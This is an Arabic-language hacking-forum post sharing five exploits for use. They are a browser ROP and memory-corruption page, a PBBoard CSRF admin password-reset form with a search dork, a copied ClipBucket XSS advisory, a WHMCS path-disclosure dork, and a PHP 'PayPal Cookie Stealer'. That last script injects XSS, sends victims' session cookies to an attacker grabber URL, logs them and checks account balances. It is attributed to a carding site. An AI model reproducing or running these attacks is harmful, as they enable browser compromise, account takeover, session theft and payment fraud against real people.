السلام عليكم انشاء الله تكونو بخير نبدا ب الثغرة الاولى وهي خاصة بالمتصفحات الفايرفوكس و الانترنيت اكسبولر # Title : Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption # Date: 2013-02-18 # Softwares Link: http://www.mozilla.org http://www.opera.com/ http://windows.microsoft.com/fr-CA/internet-explorer/ # phone : +447024073406 # Author: The Black Devils # Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5 # Home: www.arab47.com منتديات عرب غرداية # Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s <html> <head> <title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title> <body onload="javascript:hakim();"> <script language="JavaScript"> function hakim() { var rop =unescape("%ubcf1%u1000"); rop+=unescape("%uf5ef%u1000"); rop+=unescape("%u0000%u0000"); rop+=unescape("%ucf2c%u1000"); rop+=unescape("%uea03%u1001"); rop+=unescape("%u6f51%u1000"); rop+=unescape("%ubfc1%u1000"); rop+=unescape("%u0060%u1002"); rop+=unescape("%u0c50%u0c0c"); rop+=unescape("%uee6a%u1000"); rop+=unescape("%udda4%u1000"); rop+=unescape("%u4870%u1000"); rop+=unescape("%u1ab4%u1000"); rop+=unescape("%u58c3%u1000"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%uf986%u1000"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u0070%u0041"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u4142%u4142"); rop+=unescape("%u0078%u0075"); rop+=unescape("%u006c%u002e"); rop+=unescape("%u0064%u006c"); rop+=unescape("%u006c%u0000"); rop+=unescape("%ucf2c%u1000"); rop+=unescape("%u3374%u00a6"); rop+=unescape("%u8acf%u1001"); rop+=unescape("%u8dd1%u1000"); rop+=unescape("%ue0b8%u1000"); rop+=unescape("%u3f14%u1001"); rop+=unescape("%ue0b8%u1000"); rop+=unescape("%u62d5%u1001"); rop+=unescape("%ucf2c%u1000"); rop+=unescape("%u9d12%u1001"); rop+=unescape("%uf5ef%u1000"); rop+=unescape("%u0001%u0000"); rop+=unescape("%u1000%u0000"); rop+=unescape("%u7e46%u1000"); rop+=unescape("%u0040%u0000"); rop+=unescape("%uaa6a%u1000"); rop+=unescape("%uaa03%u1001"); rop+=unescape("%u4870%u1000"); rop+=unescape("%u4870%u1000"); rop+=unescape("%u58c3%u1000"); document.write(rop); var buffer = '\x41\x45\xF2' for(i=0; i <= 999 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </body> </html> // Proof of concept http://5.53.78ae.static.theplanet.co...ns%20titre.GIF if you click on that link your browser will crash [url]http://5.53.78ae.static.theplanet.com/~amodio/dz.html[/url] الثغرة الثانية PBBoard Version 3.0.0 CSRF Vulnerability Open a new html file and put the code below with changing PBBoard Version 3.0.0 CSRF Vulnerability Dork:Powered by PBBoard © Version 3.0.0 the url and click Send HTML Code: <form action="http://localhost/pbboard/index.php?page=new_password&forget=1" method="post" name="main" id="main"> <input type="hidden" name="member_id" value="1"> <input type="hidden" name="new_password" value="pass"> <input type="submit" name="Submit" value="Send"> </form> member_id For the user id (default value is 1 for admin) new_password the new password to change for(default password is pass) الثغرة الثالثة Information -------------------- Name : XSS Vulnerabilities in ClipBucket Software : ClipBucket 2.6 and possibly below. Vendor Homepage : http://clip-bucket.com Vulnerability Type : Cross-Site Scripting Severity : Critical Researcher : Canberk Bolat Advisory Reference : NS-12-013 Description -------------------- ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community. This script comes with all the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable & scalable media distribution platform with latest social networking features, while staying light on your pockets. Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video management needs. Details -------------------- ClipBucket is affected by XSS vulnerabilities in version 2.6 Params: (cat, sort, time, seo_cat_name, cat, sort, time, page, seo_cat_name) Files: (channels.php, collections.php, groups.php, photos.php, videos.php) http://example.com/search_result.php...&submit=Search signup.php (POST: username) You can read the full article about Cross-Site Scripting from here: Cross-site Scripting (XSS) Solution -------------------- No fix. Advisory Timeline -------------------- 05/12/2011 - First Contact 03/01/2012 - Second Contact - No Reply 19/10/2012 - Advisory Released Credits -------------------- It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/. References -------------------- Vendor Url / Patch : - MSL Advisory Link : http://www.mavitunasecurity.com/xss-...in-clipbucket/ Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web الثغرة الرابعة وهي الاحلى بينهم WHMCS <= 5.1.3 Full Path Disclosure Vulnerability [#] Dork : intext:netearthone.php [#] exploit : http://website/includes/smarty/Smart...iler.class.php http://website/modules/registrars/ne...etearthone.php الثغرة الخامسة PayPal Cookie Stealer exploit XSS-Free <?php /* Website: You are not allowed to view links. Register or Login to view. PayPal Cookie Stealer exploit XSS-Free (CarderX.com) Coded by: mainl00p Type: Private <No leech. **** you! **** m1nu3t and all his band _|_!> (O) <M o <M PayPal Blow Up! Cross Site Scripting (The SWORD TEAM) /| ...... /:M\------------------------------------------------,,,,,, (O)[]XXXXXX[]I:K+}=====<{H}>================================------------> \| ^^^^^^ \:W/------------------------------------------------'''''' o <W mainl00p <W You are not allowed to view links. Register or Login to view. (O) */ define("PPLOGIN_URL", "https://www.paypal.com/en"); define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name=%22/%3E%27&q=%22&search_cat=®ion=%22%3E%3Ciframe%20 onload=alert(0)/%3E"); define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES) define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL // I put automatically those fields (_t must be there, it can have random value, I preferred NULL) function doXSS($Vector) { echo "<form id=\"sui_m\" name=\"sui_m\" method=\"post\" class=\"\" action=\"" . PPXSS_URL . "\"> <input type=\"hidden\" name=\"_t\" value=\"\"/> <input type=\"hidden\" name=\"_fl\" value=\"1\" /> <input type=\"hidden\" name=\"atoi\" value=\"0\" /> <input type=\"hidden\" name=\"min\" value=\"0\" /> <input type=\"hidden\" name=\"max[0]\" value=\"\" /> <input type=\"hidden\" name=\"load\" value=\"$Vector\" /> </form> <script type=\"text/javascript\">document.getElementById(\"sui_m\").su bmit();</script>"; } // Gets the cookie from GET parameter returned by XSS and stores it in file function getCookie() { if (isset($_GET["c"])) { $f = fopen(COOKIE_FILE, "a"); $c = base64_encode($_GET["c"]); fwrite($f, $c . "\n"); fclose($f); } } // Reads the cookie from file function readCookies() { $c = file_get_contents(COOKIE_FILE); return explode("\n", $c); } // Logs in and checks the ballance function check($Cookie) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_COOKIE, $Cookie); $s = curl_exec($ch); if (preg_match("/Ballance: (.*)\<\/b\>/i", $s, $z)) return $z[1]; return NULL; } // MAIN if (isset($_GET["admin"]) && $_GET["admin"] == "true") { $ck = readCookies(); echo "<table style=\"font-size: 12px;\">\n"; echo "<tr style=\"background-color: red; color: white;\"><td style=\"width: 50px;\"><b>Id</b></td><td style=\"width: 700px;\"><b>Cookie</b></td><td><b>Check</b></td></tr>\n"; $i = 0; foreach ($ck as $c) { echo "<tr style=\"background-color: grey;\"><td>" . ++$i . "</td><td>$c</td><td><a href=\"?check=" . base64_encode($c) . "\">Check</a></td></tr>\n"; } die(""); } if (isset($_GET["check"]) && $_GET["check"] != "") { $cz = check(check($_GET["check"])); if ($cz != NULL) echo "Ballance: " . $cz; else echo "Error logging in!"; die(""); } $XSS = "\">**********window.location=" . EXPLOIT_URL . "?c=" . "\" + document.cookie;</script>"; doXSS($XSS); ?> ارجو ان تنال اعجابكم وارجو التفاعل في منتدى . واهداء الى كل اعضاء ومشرفينا
قوانين المنتدى